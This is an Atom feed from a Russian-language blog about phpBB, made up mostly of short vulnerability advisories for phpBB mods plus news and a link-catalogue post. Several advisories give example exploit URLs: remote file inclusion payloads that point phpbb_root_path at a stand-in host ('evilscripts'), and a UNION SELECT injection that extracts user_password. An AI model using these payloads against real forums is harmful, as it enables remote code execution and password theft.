<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4557582696106471310</id><updated>2011-04-22T01:54:54.928+06:00</updated><category term='Уязвимости МОДов'/><category term='Проблемы'/><category term='Шшилки'/><category term='Теория'/><category term='Новые версии'/><category term='Кроме того'/><category term='Уязвимости'/><title type='text'>Блог о форуме phpBB</title><subtitle type='html'>Доступно о форуме phpBB. Новости, моды, скины и стили.
Уязвимости. Рекомендации.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://aboutphpbb.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>22</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-6419867335860550435</id><published>2007-04-01T22:52:00.000+06:00</published><updated>2007-04-01T22:56:11.457+06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: SQL-инъекция в phpBB Minerva Mod</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «c» сценарием forum.php. Пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.Пример: forum.php?c=-1/**/UNION/**/SELECT/* */0,1,2,3,4,user_password,6/**/</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/6419867335860550435'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/6419867335860550435'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/04/phpbb-sql-phpbb-minerva-mod.html' title='Уязвимости phpBB: SQL-инъекция в phpBB Minerva Mod'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-4039235856826596259</id><published>2007-03-20T22:45:00.000+05:00</published><updated>2007-03-20T22:49:08.196+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Проблемы'/><category scheme='http://www.blogger.com/atom/ns#' term='Новые версии'/><title type='text'>Сайт phpBB починили</title><summary type='text'>Починить то починили, только файлы со всякими приблудами пока еще 404-ю ошибку возвращают.Зато новый дизайн сайта радует! :-)Молодцы!</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/4039235856826596259'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/4039235856826596259'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/03/phpbb_20.html' title='Сайт phpBB починили'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-5973620113512749643</id><published>2007-03-14T23:27:00.000+05:00</published><updated>2007-03-14T23:32:17.268+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Кроме того'/><title type='text'>Что обычно делают с форумом</title><summary type='text'>Итак, у вас есть форум. Причем не просто форум, а посещаемый. Что дальше?Дальше его нужно развивать. Для этого нужны деньги. Где их взять? Все просто - вы уже обладаете ресурсом по их получению. Нужно только правильно организовать процесс. Об этом хорошо рассказывает мой друг - автор сайта Интернет-бизнес: идеи бизнеса.</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5973620113512749643'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5973620113512749643'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/03/blog-post.html' title='Что обычно делают с форумом'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-8707639910939176309</id><published>2007-03-11T19:17:00.000+05:00</published><updated>2007-03-14T21:37:53.532+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Проблемы'/><title type='text'>Маленько сломался сайт phpBB / phpBB.com down :(</title><summary type='text'>Судя по тексту вышло из строя сразу 2 диска в RAID. Пострадала в основном CVS, информацию в которой еще восстанавливать и восстанавливать. Сам сайт обещают починить в ближайшее время.</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/8707639910939176309'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/8707639910939176309'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/03/phpbb_11.html' title='Маленько сломался сайт phpBB / phpBB.com down :('/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-3494056586138284042</id><published>2007-02-27T22:44:00.000+05:00</published><updated>2007-03-04T23:00:01.850+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в phpBB Module NoMoKeTos Rules</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием includes/functions_nomoketos_rules.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Источник: xakep.ru</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/3494056586138284042'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/3494056586138284042'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/03/phpbb.html' title='Уязвимости phpBB: PHP-инклюдинг в phpBB Module NoMoKeTos Rules'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-3837291097736759629</id><published>2007-02-27T22:42:00.000+05:00</published><updated>2007-03-04T22:59:35.248+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в Extreme phpBB</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?Источник: </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/3837291097736759629'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/3837291097736759629'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/03/phpbb-php-extreme-phpbb.html' title='Уязвимости phpBB: PHP-инклюдинг в Extreme phpBB'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-6072371881296879849</id><published>2007-02-16T22:39:00.000+05:00</published><updated>2007-03-04T22:59:21.714+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в phpBB++</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе.Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/6072371881296879849'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/6072371881296879849'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/03/phpbb-php-phpbb.html' title='Уязвимости phpBB: PHP-инклюдинг в phpBB++'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-7680669520523947447</id><published>2007-02-06T23:11:00.000+05:00</published><updated>2007-02-23T18:45:48.254+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в Categories hierarchy phpBB Mod</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием class_template.php. Пользователь пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.Пример: /includes/class_template.php?phpbb_root_path=http://</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/7680669520523947447'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/7680669520523947447'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/02/php-categories-hierarchy-phpbb-mod.html' title='Уязвимости phpBB: PHP-инклюдинг в Categories hierarchy phpBB Mod'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-710722092653560283</id><published>2007-02-05T20:14:00.000+05:00</published><updated>2007-02-23T18:49:31.170+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в phpbb Tweaked</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/710722092653560283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/710722092653560283'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/02/php-phpbb-tweaked.html' title='Уязвимости phpBB: PHP-инклюдинг в phpbb Tweaked'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-1737268160473204862</id><published>2007-02-01T23:15:00.000+05:00</published><updated>2007-02-23T18:51:05.118+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в Cerulean Portal System</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием portal.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Пример: /portal/portal.php?phpbb_root_path=http://evilscripts?Источник: xakep.ru</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/1737268160473204862'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/1737268160473204862'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/02/php-cerulean-portal-system.html' title='Уязвимости phpBB: PHP-инклюдинг в Cerulean Portal System'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-5343867728248453726</id><published>2007-01-31T23:20:00.000+05:00</published><updated>2007-02-23T18:52:50.143+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в phpBB2 MODificat</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?Источник: xakep.ru</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5343867728248453726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5343867728248453726'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/01/php-phpbb2-modificat.html' title='Уязвимости phpBB: PHP-инклюдинг в phpBB2 MODificat'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-4810975299067894930</id><published>2007-01-30T23:21:00.000+05:00</published><updated>2007-02-23T18:54:57.923+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в Xero Portal</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценариях admin/admin_linkdb.php, admin/admin_forum_prune.php, admin/admin_extensions.php, admin/admin_board.php, admin/admin_attachments.php и admin/admin_users.php. Пользователь может выполнить произвольный </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/4810975299067894930'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/4810975299067894930'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/02/php-xero-portal.html' title='Уязвимости phpBB: PHP-инклюдинг в Xero Portal'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-7357970022243123610</id><published>2007-01-29T17:23:00.000+05:00</published><updated>2007-02-23T18:55:43.209+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в EclipseBB Lite</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Источник: xakep.ru</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/7357970022243123610'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/7357970022243123610'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/01/php-eclipsebb-lite.html' title='Уязвимости phpBB: PHP-инклюдинг в EclipseBB Lite'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-5109520149214751103</id><published>2007-01-26T19:40:00.000+05:00</published><updated>2007-02-23T18:58:15.418+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в Virtual Path for phpBB</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием vp/configure.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.Пример: /vp/configure.php?phpbb_root_path=http://evilscripts?Источник: xakep.ru</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5109520149214751103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5109520149214751103'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/01/php-virtual-path-for-phpbb.html' title='Уязвимости phpBB: PHP-инклюдинг в Virtual Path for phpBB'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-832105797386638804</id><published>2006-12-26T23:01:00.000+05:00</published><updated>2007-02-23T18:57:51.152+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости МОДов'/><title type='text'>Уязвимости phpBB: PHP-инклюдинг в PhpbbXtra</title><summary type='text'>Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" сценарием archive_topic.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.Пример: /includes/archive/archive_topic.php?phpbb_root_path=http://evil_scripts?</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/832105797386638804'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/832105797386638804'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2006/12/php-phpbbxtra.html' title='Уязвимости phpBB: PHP-инклюдинг в PhpbbXtra'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-3685349523561487976</id><published>2006-12-25T16:48:00.000+05:00</published><updated>2007-02-06T23:44:22.885+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Новые версии'/><title type='text'>Вышел phpBB 2.0.22</title><summary type='text'>В новый релиз включено много полезных исправлений по части безопасности, например так называемая плавающая ошибка XSS в системе личных сообщений. Со всеми изменениями вы можете ознакомиться здесь (на русском). Там же есть ссылка на дистрибутив.</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/3685349523561487976'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/3685349523561487976'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2006/12/phpbb-2022.html' title='Вышел phpBB 2.0.22'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-4804045158153486408</id><published>2006-12-09T23:30:00.000+05:00</published><updated>2007-02-23T18:58:56.665+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости'/><title type='text'>Уязвимости phpBB: Межсайтовый скриптинг в phpBB</title><summary type='text'>Обнаружена уязвимость в phpBB последней версии 2.0.21. Удаленный пользователь может произвести XSS нападение и CSRF атаку. Как видно из сообщения об уязвимости, XSS нападение возможно через сервис личных сообщений (private messages).Опасность: Низкая.Способов устранения уязвимости на данный момент не существует.</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/4804045158153486408'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/4804045158153486408'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2006/12/phpbb.html' title='Уязвимости phpBB: Межсайтовый скриптинг в phpBB'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-8531826184719385405</id><published>2006-11-28T22:44:00.001+05:00</published><updated>2006-11-28T22:44:48.527+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Проблемы'/><title type='text'>Руководство по phpBB и ФАКи</title><summary type='text'>Что делать, если вы не понимаете как что-то сделать? Прочтите руководство.Не помогло? Тогда вам нужно посмотреть список наиболее часто встречающихся вопросов.И это не помогло? Тогда максимально четко опишите проблему и вперед, на форум.</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/8531826184719385405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/8531826184719385405'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2006/11/phpbb_28.html' title='Руководство по phpBB и ФАКи'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-5625702128667935678</id><published>2006-11-26T21:59:00.001+05:00</published><updated>2006-11-26T21:59:09.341+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Уязвимости'/><category scheme='http://www.blogger.com/atom/ns#' term='Теория'/><title type='text'>Важность настроек хостинга</title><summary type='text'>Уж сколько раз твердили миру... тем не менее находятся люди (особенно обидно, если это хостеры), которые все еще включают на хостинге register_globals. Данная проблема хорошо описана на сайте PHP, причем с примерами взлома, причем в 2003 году! Тем не менее через эту дырку постоянно ломают сайты.В статье "Поиск PHP уязвимостей на примере phpBB" прекрасно описан процесс взлома с использованием этой</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5625702128667935678'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5625702128667935678'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2006/11/blog-post_26.html' title='Важность настроек хостинга'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-5005212256975791081</id><published>2006-11-25T22:41:00.001+05:00</published><updated>2006-11-25T22:41:53.580+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Теория'/><title type='text'>Что такое phpBB?</title><summary type='text'>Это форум, написаный на языке PHP и использующий для хранения данных СУБД, чаще всего MySQL. Описание форума phpBB в Википедии.</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5005212256975791081'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/5005212256975791081'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2006/11/phpbb.html' title='Что такое phpBB?'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-1062852854847170688</id><published>2006-11-25T20:50:00.001+05:00</published><updated>2006-11-25T22:19:06.589+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Теория'/><title type='text'>Что это за блог?</title><summary type='text'>Здесь я буду собирать все важное о форуме phpBB.</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/1062852854847170688'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/1062852854847170688'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2006/11/blog-post.html' title='Что это за блог?'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-4557582696106471310.post-7126043289683513430</id><published>2006-11-11T11:11:00.000+05:00</published><updated>2007-03-08T08:56:13.875+05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Шшилки'/><title type='text'>Каталоги</title><summary type='text'>раскрутка сайта и имиджевая рекламаГипермаркет www.torgpred.com: где купить и как заработать? Надежные интернет-магазины и партнерские программыАвтомобили на Promotion.SU. Продажа автомобилей, японские и американские автомобили, подержанные автомобили.Дизайн студия Мосолов.Info - Изготовление интернет сайтов, домашних страниц, банеров, рекламных буклетов для типографии, визиток, логотипов </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/7126043289683513430'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4557582696106471310/posts/default/7126043289683513430'/><link rel='alternate' type='text/html' href='http://aboutphpbb.blogspot.com/2007/11/blog-post.html' title='Каталоги'/><author><name>SirGo</name><uri>http://www.blogger.com/profile/13960053835361897942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry></feed>
